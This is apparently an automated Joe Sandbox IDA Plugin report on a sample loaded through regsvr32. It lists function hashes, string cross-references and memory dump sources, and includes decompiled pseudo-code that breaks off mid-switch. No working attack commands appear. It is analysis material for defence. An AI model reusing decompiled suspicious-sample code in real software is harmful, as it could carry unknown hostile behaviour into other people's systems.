Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 1C4$F7$E
API String ID: 0-3303878784
Opcode ID: ec422184f0bc8e42d70ac5f52bb51cad38797440f210b574c256831cfc5cf489
Instruction ID: 44ab69995422899ef027044efd44791a73585eefd3af5f98eb0252fa7e8e7584
Opcode Fuzzy Hash: ec422184f0bc8e42d70ac5f52bb51cad38797440f210b574c256831cfc5cf489
Instruction Fuzzy Hash: 415165B2109381AFD798CF25D98981FBBE5FBD4748F405A2DF19696260D370DA09CB82

Uniqueness

Uniqueness Score: -1.00%

Function 04B8B820, Relevance: 3.9, Strings: 3, Instructions: 145COMMON

Download Yara Rule

Strings

$P, xrefs: 04B8B83F
Ei, xrefs: 04B8B835
v-, xrefs: 04B8BA01

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$Ei$v-
API String ID: 0-1888193988
Opcode ID: 09c60563c9febd93abc110f0305c88b7a72cc5e9348a5361bae9e43654e6fc9e
Instruction ID: c10abc9275c92f28ac28eecb466c1cf194f336d07acaf59bb66e5829708827bc
Opcode Fuzzy Hash: 09c60563c9febd93abc110f0305c88b7a72cc5e9348a5361bae9e43654e6fc9e
Instruction Fuzzy Hash: B96144B150C3809FD398CF25D48980BBBF1FBC8718F408A1DF19656260D7B5AA1ACF46

Uniqueness

Uniqueness Score: -1.00%

Function 04BA07AA, Relevance: 3.9, Strings: 3, Instructions: 145COMMON

Download Yara Rule

Strings

n~, xrefs: 04BA0906
jv~, xrefs: 04BA092E
5b, xrefs: 04BA08B8

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 5b$jv~$n~
API String ID: 0-1119068381
Opcode ID: 23b7adf78ec0d7529c3fcb580c47d7552b88b2454a070a56c9fe930dcd2bf3fe
Instruction ID: a381dee80b12d060041c6883c1e2b793d05d5726428fce3131291883bd8e7af8
Opcode Fuzzy Hash: 23b7adf78ec0d7529c3fcb580c47d7552b88b2454a070a56c9fe930dcd2bf3fe
Instruction Fuzzy Hash: 6C516572408305AFC748DF25C98981FBBE1FBC8758F508A1DF196A6220D371DA8ACF46

Uniqueness

Uniqueness Score: -1.00%

Function 04B97A0F, Relevance: 3.9, Strings: 3, Instructions: 137COMMON

Download Yara Rule

Strings

<, xrefs: 04B97B6B
Dy~, xrefs: 04B97B8E
-,, xrefs: 04B97A4F

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: -,$<$Dy~
API String ID: 0-1106285139
Opcode ID: 1d5781b3e5fef1fdb7bde552c5c28d48affc402afba2fdf6d16d775d2e61dc69
Instruction ID: 3e82f5d1f6d90b89fcc7c1e5abaa7d3aae5bcb40fd8983a4331910e28c2c6709
Opcode Fuzzy Hash: 1d5781b3e5fef1fdb7bde552c5c28d48affc402afba2fdf6d16d775d2e61dc69
Instruction Fuzzy Hash: 2561DF71C0120EEBDF08CFE5E98A9EEBBB2FB48314F208159E111B6260D7B55A55CF94

Uniqueness

Uniqueness Score: -1.00%

Function 04B87442, Relevance: 3.9, Strings: 3, Instructions: 116COMMON

Download Yara Rule

Strings

F, xrefs: 04B874EB
K3xq, xrefs: 04B87446
k_, xrefs: 04B8751B

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: F$K3xq$k_
API String ID: 0-3174058581
Opcode ID: c255ef584a53b21b75772abdeb4227663c61a4f54bd09fbb0ce888a68e4894e8
Instruction ID: f1ee9703c0dc04fcc2f57feca1f5fa59173dbd6345533ec525cbdbddb90da332
Opcode Fuzzy Hash: c255ef584a53b21b75772abdeb4227663c61a4f54bd09fbb0ce888a68e4894e8
Instruction Fuzzy Hash: BB41DEB06083029FD718EF24D88582FBBE1FBC4758F10095EF58586261DB70DA08CB93

Uniqueness

Uniqueness Score: -1.00%

Function 04B9A2A5, Relevance: 3.9, Strings: 3, Instructions: 105COMMON

Download Yara Rule

Strings

7, xrefs: 04B9A2C0
=l, xrefs: 04B9A35F
l7u, xrefs: 04B9A2F6

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: =l$l7u$7
API String ID: 0-2380881030
Opcode ID: 9bd861a17e50e1842b023df280c62c647e242fbd3a8f7a95759dc3328f1bdc73
Instruction ID: 2930c1b4233aefac08067de531d675b494b4f6826279add9708ffdd3a689942d
Opcode Fuzzy Hash: 9bd861a17e50e1842b023df280c62c647e242fbd3a8f7a95759dc3328f1bdc73
Instruction Fuzzy Hash: C1511071D0060AABDF44CFE5D94A5EEBBB0FF44318F208198D512B2210D7B44A59CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04B8BAA9, Relevance: 3.8, Strings: 3, Instructions: 89COMMON

Download Yara Rule

Strings

k9j, xrefs: 04B8BBBA
c/c, xrefs: 04B8BAE9
zm, xrefs: 04B8BACF

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: c/c$k9j$zm
API String ID: 0-1793526708
Opcode ID: d43419449e52b5cbd41cd5db91105e5f334013690b7b8493d0933a13370cd3ef
Instruction ID: ddc6b212c715cc13c34a2bf307aca0533fd1b3202a59c24d9e0e846b9a33046d
Opcode Fuzzy Hash: d43419449e52b5cbd41cd5db91105e5f334013690b7b8493d0933a13370cd3ef
Instruction Fuzzy Hash: DB412372C0030AABDF04DFA5C84A5EEBBB6FF44318F108598E425A6250D7B49B14CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1001FC43, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E1001FC43(void* __eax, void* __ebx, void* __edx) {
				_Unknown_base(*)()* _t8;

				 *((intOrPtr*)(__edx + __ebx - 1)) =  *((intOrPtr*)(__edx + __ebx - 1)) + __edx;
				_t8 = SetUnhandledExceptionFilter(E1001BD6F());
				 *0x1005b670 = 0;
				return _t8;
			}

0x1001fc48
0x1001fc58
0x1001fc5e
0x1001fc65

APIs

__decode_pointer.LIBCMT ref: 1001FC51

Part of subcall function 1001BD6F: TlsGetValue.KERNEL32(?,1001C0FD,00000000,00000000,10017A84,00000000,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840), ref: 1001BD7C
Part of subcall function 1001BD6F: TlsGetValue.KERNEL32(00000006,?,1001C0FD,00000000,00000000,10017A84,00000000,?,?,00000001,?,?,10017AE8,00000001), ref: 1001BD93

SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001FC58

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Value$ExceptionFilterUnhandled__decode_pointer
String ID:
API String ID: 1958600898-0
Opcode ID: c0118062e478c14860ac704cd26963d59993939b078219122e56b5b05da27951
Instruction ID: 8c383471f53841a55e0fcdb182c1f4564aa38491823c170ddba15b1e5c66fe32
Opcode Fuzzy Hash: c0118062e478c14860ac704cd26963d59993939b078219122e56b5b05da27951
Instruction Fuzzy Hash: E0C04C59818ED49AE715DF745C9D70D7F14E712508FD40589D480851A2DE6CA049C931

Uniqueness

Uniqueness Score: -1.00%

Function 04B9AD08, Relevance: 2.7, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

&b, xrefs: 04B9AE84
r+, xrefs: 04B9AF9B

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: &b$r+
API String ID: 0-3016113347
Opcode ID: 70ad7e8c1b7bc09d2a861fbb81202310a92142a23cc7e7116895a1eaeb6b846a
Instruction ID: 91378e9946140886811637a47cd4ca13344f8c3eabaca019674dc40c6f69b071
Opcode Fuzzy Hash: 70ad7e8c1b7bc09d2a861fbb81202310a92142a23cc7e7116895a1eaeb6b846a
Instruction Fuzzy Hash: EBC152B150C3409FD7A8CF66C88980BFBE1FBD4758F108A6DF29686260C7B59909CF42

Uniqueness

Uniqueness Score: -1.00%

Function 04B94F74, Relevance: 2.7, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

X\2, xrefs: 04B95164
E, xrefs: 04B951FD

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: E$X\2
API String ID: 0-703089088
Opcode ID: 509cf2592a40564013f6ec662ccb4a872a5e58db65c67fc24a38b2927d48e54c
Instruction ID: 0d335f5f2a88b48604c6f259f610c69c7f82d26292dab9035532bcea050eef63
Opcode Fuzzy Hash: 509cf2592a40564013f6ec662ccb4a872a5e58db65c67fc24a38b2927d48e54c
Instruction Fuzzy Hash: A69132725083809FC768CF25D88A51BBBE1FBC4398F544A2DF29696260D3B1DA49CF47

Uniqueness

Uniqueness Score: -1.00%

Function 04B8DE74, Relevance: 2.7, Strings: 2, Instructions: 193COMMON

Download Yara Rule

Strings

}#J, xrefs: 04B8DF70
g>~, xrefs: 04B8DFAD

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: g>~$}#J
API String ID: 0-4030106083
Opcode ID: 281e90e724a1d0b42179f4f5c74141918747e1eaea175391f46cddc5e236d033
Instruction ID: d3cfb9b0116b30713a40434ed9d65f59c00e76586f76d39001f4de7b8cae3391
Opcode Fuzzy Hash: 281e90e724a1d0b42179f4f5c74141918747e1eaea175391f46cddc5e236d033
Instruction Fuzzy Hash: 0F9164719083418FC798EF65C48541BFBE1FB84358F504A6EF89A97260D3B5EA09CF86

Uniqueness

Uniqueness Score: -1.00%

Function 04B8E7DE, Relevance: 2.7, Strings: 2, Instructions: 191COMMON

Download Yara Rule

Strings

F.<`, xrefs: 04B8E90E
-br, xrefs: 04B8E98E

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: -br$F.<`
API String ID: 0-3678315648
Opcode ID: eaec14a4876c9c72c20777f37d81c5f73ce4be34e10a3d9202af31a534b2139e
Instruction ID: f28e97e15502042becc56feb213b6c823be1781a3b450fff640c6f5269eea17a
Opcode Fuzzy Hash: eaec14a4876c9c72c20777f37d81c5f73ce4be34e10a3d9202af31a534b2139e
Instruction Fuzzy Hash: 049132715083419FD758DF64C98991BBBE0FBD4748F00492DF68696260D3B1EA49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 04B9654A, Relevance: 2.7, Strings: 2, Instructions: 157COMMON

Download Yara Rule

Strings

#V, xrefs: 04B96594
=l,, xrefs: 04B966AA

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: =l,$#V
API String ID: 0-882995766
Opcode ID: 63d82414185dada1c286f70f67569fe37ebaaf7d58e8b6f899c28194972c03bf
Instruction ID: 85e6b15f7d529ecc60da3cf17ed7ef000b03fe26cc4c911ac979b8d6faf295ee
Opcode Fuzzy Hash: 63d82414185dada1c286f70f67569fe37ebaaf7d58e8b6f899c28194972c03bf
Instruction Fuzzy Hash: 9381F0B1D0120DEBCF08CFA0D98A8EEBBB5FF48318F208159E515BA250D7B45A49CF94

Uniqueness

Uniqueness Score: -1.00%

Function 04B907F4, Relevance: 2.6, Strings: 2, Instructions: 113COMMON

Download Yara Rule

Strings

W^)i, xrefs: 04B908EE
a9, xrefs: 04B9083D

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: W^)i$a9
API String ID: 0-1728637351
Opcode ID: dfead49b275c670f3aaafee43dfdb8b14395dae2b545d5785eb2ce325a0043ca
Instruction ID: eebc16c593f5b4613434c9b9b0ca9847647fc801e013d837ecbb37bb722eb649
Opcode Fuzzy Hash: dfead49b275c670f3aaafee43dfdb8b14395dae2b545d5785eb2ce325a0043ca
Instruction Fuzzy Hash: 47417571508301CBDB14DF24D58981FFBE1FBD8358F144A2EF6DAA6260D370AA498F86

Uniqueness

Uniqueness Score: -1.00%

Function 04B95333, Relevance: 2.6, Strings: 2, Instructions: 107COMMON

Download Yara Rule

Strings

`0, xrefs: 04B953F8
j0, xrefs: 04B95355

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: `0$j0
API String ID: 0-1706687062
Opcode ID: a698ae834057bf3177c30c95693b9f296898de2c2be967a0d04c9a146b8b5e9c
Instruction ID: 3a8c81171022691fba6c60caba9d429115f2ac344e783935a3641374a5455837
Opcode Fuzzy Hash: a698ae834057bf3177c30c95693b9f296898de2c2be967a0d04c9a146b8b5e9c
Instruction Fuzzy Hash: 434176724083029FC755DF25998940BFBE1FBD8B58F104E2DF8A9A6260D3709A59CF93

Uniqueness

Uniqueness Score: -1.00%

Function 04B87E79, Relevance: 2.6, Strings: 2, Instructions: 104COMMON

Download Yara Rule

Strings

bg, xrefs: 04B87ECC
~z#, xrefs: 04B87F30

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: bg$~z#
API String ID: 0-3633068236
Opcode ID: d27443a6954f6df962cc2ff153474a91a954d70af200d7c111dd209c5580846d
Instruction ID: e90a7ff5fad4aa53d9aaa3fa6f63fc3f47a9d744197892d2d961d7633010f690
Opcode Fuzzy Hash: d27443a6954f6df962cc2ff153474a91a954d70af200d7c111dd209c5580846d
Instruction Fuzzy Hash: 7D415272C0021EDBDF19DFA0C84A5EEFBB1EF54318F208199C451B6220D7B81A4ACFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04B95515, Relevance: 2.6, Strings: 2, Instructions: 92COMMON

Download Yara Rule

Strings

(8r, xrefs: 04B95578
bWr, xrefs: 04B9551E

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: bWr$(8r
API String ID: 0-4034592896
Opcode ID: 6bd561600b29e8d40b53efd76a24b6e4d1b51c40b914b8d5291e690eb23a4ca9
Instruction ID: a67a9321a0e7c02fc00f4dc01d359344e91c37ee09bccd70e784fb0ed7138113
Opcode Fuzzy Hash: 6bd561600b29e8d40b53efd76a24b6e4d1b51c40b914b8d5291e690eb23a4ca9
Instruction Fuzzy Hash: FB413472C00219EFCF19CFA4C98A9EEBBB5FB04304F10819AD511B6260D3B46B85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 1001178A, Relevance: 1.9, APIs: 1, Instructions: 445
COMMONCrypto

Download Yara Rule

C-Code - Quality: 37%

			E1001178A(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				unsigned int _t147;
				signed int _t149;
				signed int* _t152;
				intOrPtr _t159;
				intOrPtr* _t160;
				unsigned int _t163;
				unsigned int _t166;
				signed int* _t170;
				signed int* _t173;
				unsigned int _t177;
				unsigned int _t181;
				unsigned int _t185;
				signed int _t189;
				signed int* _t194;
				signed int _t195;
				unsigned int _t196;
				intOrPtr* _t197;
				unsigned int _t198;
				signed int _t213;
				signed int _t217;
				unsigned int _t224;
				void* _t225;

				_t200 = __ecx;
				_push(0x70);
				E10017BC1(E100286B6, __ebx, __edi, __esi);
				_t222 = __ecx;
				 *((intOrPtr*)(_t225 - 0x10)) = 0;
				 *((intOrPtr*)(_t225 - 0x14)) = 0x7fffffff;
				_t189 =  *(_t225 + 8);
				 *(_t225 - 4) = 0;
				if(_t189 != 0x111) {
					__eflags = _t189 - 0x4e;
					if(_t189 != 0x4e) {
						__eflags = _t189 - 6;
						_t224 =  *(_t225 + 0x10);
						if(_t189 == 6) {
							E10011159(_t200, _t222,  *((intOrPtr*)(_t225 + 0xc)), E1000FB5C(_t189, __ecx, _t225, _t224));
						}
						__eflags = _t189 - 0x20;
						if(_t189 != 0x20) {
							L12:
							_t147 =  *(_t222 + 0x4c);
							__eflags = _t147;
							if(_t147 == 0) {
								L20:
								_t149 =  *((intOrPtr*)( *_t222 + 0x28))();
								 *(_t225 + 0x10) = _t149;
								E1000E7D9(_t225 - 0x14, _t222, 7);
								_t194 = 0x10058f50 + ((_t149 ^  *(_t225 + 8)) & 0x000001ff) * 0xc;
								__eflags =  *(_t225 + 8) -  *_t194;
								 *(_t225 - 0x18) = _t194;
								if( *(_t225 + 8) !=  *_t194) {
									L25:
									_t152 =  *(_t225 - 0x18);
									_t195 =  *(_t225 + 0x10);
									 *_t152 =  *(_t225 + 8);
									_t152[2] = _t195;
									while(1) {
										__eflags =  *_t195;
										if( *_t195 == 0) {
											break;
										}
										__eflags =  *(_t225 + 8) - 0xc000;
										_push(0);
										_push(0);
										if( *(_t225 + 8) >= 0xc000) {
											_push(0xc000);
											_push( *((intOrPtr*)( *(_t225 + 0x10) + 4)));
											while(1) {
												_t196 = E1000E064();
												__eflags = _t196;
												if(_t196 == 0) {
													break;
												}
												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) -  *(_t225 + 8);
												if( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) ==  *(_t225 + 8)) {
													( *(_t225 - 0x18))[1] = _t196;
													E1000E808(_t225 - 0x14);
													L102:
													_t197 =  *((intOrPtr*)(_t196 + 0x14));
													L103:
													_push(_t224);
													_push( *((intOrPtr*)(_t225 + 0xc)));
													L104:
													_t159 =  *_t197();
													L105:
													 *((intOrPtr*)(_t225 - 0x10)) = _t159;
													goto L106;
												}
												_push(0);
												_push(0);
												_push(0xc000);
												_t198 = _t196 + 0x18;
												__eflags = _t198;
												_push(_t198);
											}
											_t195 =  *(_t225 + 0x10);
											L36:
											_t195 =  *_t195();
											 *(_t225 + 0x10) = _t195;
											continue;
										}
										_push( *(_t225 + 8));
										_push( *((intOrPtr*)(_t195 + 4)));
										_t166 = E1000E064();
										__eflags = _t166;
										 *(_t225 + 0x10) = _t166;
										if(_t166 == 0) {
											goto L36;
										}
										( *(_t225 - 0x18))[1] = _t166;
										E1000E808(_t225 - 0x14);
										L29:
										_t213 =  *((intOrPtr*)( *(_t225 + 0x10) + 0x10)) - 1;
										__eflags = _t213 - 0x44;
										if(__eflags > 0) {
											goto L106;
										}
										switch( *((intOrPtr*)(_t213 * 4 +  &M10011CA2))) {
											case 0:
												_push( *(__ebp + 0xc));
												_push(E100131BC(__ebx, __ecx, __edi, __esi, __eflags));
												goto L44;
											case 1:
												_push( *(__ebp + 0xc));
												goto L44;
											case 2:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												__eax = E1000FB5C(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L49;
											case 3:
												_push(__esi);
												__eax = E1000FB5C(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L42;
											case 4:
												_push(__esi);
												L44:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 5:
												__ecx = __ebp - 0x28;
												E10012DE4(__ebp - 0x28) =  *(__esi + 4);
												__ecx = __ebp - 0x7c;
												 *((char*)(__ebp - 4)) = 1;
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = E1000E822(__ecx, __eflags);
												__eax =  *__esi;
												__esi =  *(__esi + 8);
												 *((char*)(__ebp - 4)) = 2;
												 *(__ebp - 0x5c) = __eax;
												__eax = E1000FB83(__ecx, __edi, __esi, __eflags, __eax);
												__eflags = __eax;
												if(__eflags == 0) {
													__eax =  *(__edi + 0x4c);
													__eflags = __eax;
													if(__eflags != 0) {
														__ecx = __eax + 0x24;
														__eax = E10014BD1(__eax + 0x24, __edi, __esi,  *(__ebp - 0x5c));
														__eflags = __eax;
														if(__eflags != 0) {
															 *(__ebp - 0x2c) = __eax;
														}
													}
													__eax = __ebp - 0x7c;
												}
												_push(__esi);
												_push(__eax);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
												 *(__ebp - 0x5c) =  *(__ebp - 0x5c) & 0x00000000;
												__ecx = __ebp - 0x7c;
												 *(__ebp - 0x10) = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 1;
												__eax = E100102A7(__ebx, __ebp - 0x7c, __edi, __esi, __eflags);
												goto L59;
											case 6:
												__ecx = __ebp - 0x28;
												E10012DE4(__ebp - 0x28) =  *(__esi + 4);
												_push( *(__esi + 8));
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												 *((char*)(__ebp - 4)) = 3;
												__eax =  *__ebx();
												_t95 = __ebp - 0x24;
												 *_t95 =  *(__ebp - 0x24) & 0x00000000;
												__eflags =  *_t95;
												 *(__ebp - 0x10) = __ebp - 0x28;
												L59:
												__ecx = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 0;
												__eax = E1001322E(__ecx);
												goto L106;
											case 7:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = E1000FB5C(__ebx, __ecx, __ebp, __esi);
												goto L61;
											case 8:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L42;
											case 9:
												goto L103;
											case 0xa:
												_push(__esi);
												_push(E10014F27(__ebx, __ecx, __edi, __esi, __eflags));
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L61:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L49:
												_push(__eax);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 0xb:
												_push(__esi);
												goto L87;
											case 0xc:
												_push( *(__ebp + 0xc));
												goto L90;
											case 0xd:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0xe:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L81;
											case 0xf:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												goto L81;
											case 0x10:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L95;
											case 0x11:
												_push(E1000FB5C(__ebx, __ecx, __ebp, __esi));
												L87:
												_push( *(__ebp + 0xc));
												goto L88;
											case 0x12:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 0x13:
												_push(E1000FB5C(__ebx, __ecx, __ebp,  *(__ebp + 0xc)));
												_push(E1000FB5C(__ebx, __ecx, __ebp, __esi));
												__eax = 0;
												__eflags =  *((intOrPtr*)(__edi + 0x20)) - __esi;
												__eax = 0 |  *((intOrPtr*)(__edi + 0x20)) == __esi;
												goto L93;
											case 0x14:
												_push( *(__ebp + 0xc));
												__eax = E100131BC(__ebx, __ecx, __edi, __esi, __eflags);
												goto L76;
											case 0x15:
												_push( *(__ebp + 0xc));
												__eax = E10014F27(__ebx, __ecx, __edi, __esi, __eflags);
												goto L76;
											case 0x16:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												_push(__si);
												_push( *(__ebp + 0xc));
												__eax = E10014F27(__ebx, __ecx, __edi, __esi, __eflags);
												goto L93;
											case 0x17:
												_push( *(__ebp + 0xc));
												goto L75;
											case 0x18:
												_push(__esi);
												L75:
												__eax = E1000FB5C(__ebx, __ecx, __ebp);
												L76:
												_push(__eax);
												goto L90;
											case 0x19:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L79;
											case 0x1a:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__ecx);
												L79:
												_push(__eax);
												__eax = E1000FB5C(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L93;
											case 0x1b:
												_push(__esi);
												__eax = E1000FB5C(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												L81:
												_push(__eax);
												goto L88;
											case 0x1c:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax = E1000FB5C(__ebx, __ecx, __ebp, __esi);
												goto L92;
											case 0x1d:
												__ecx =  *(__ebp + 0xc);
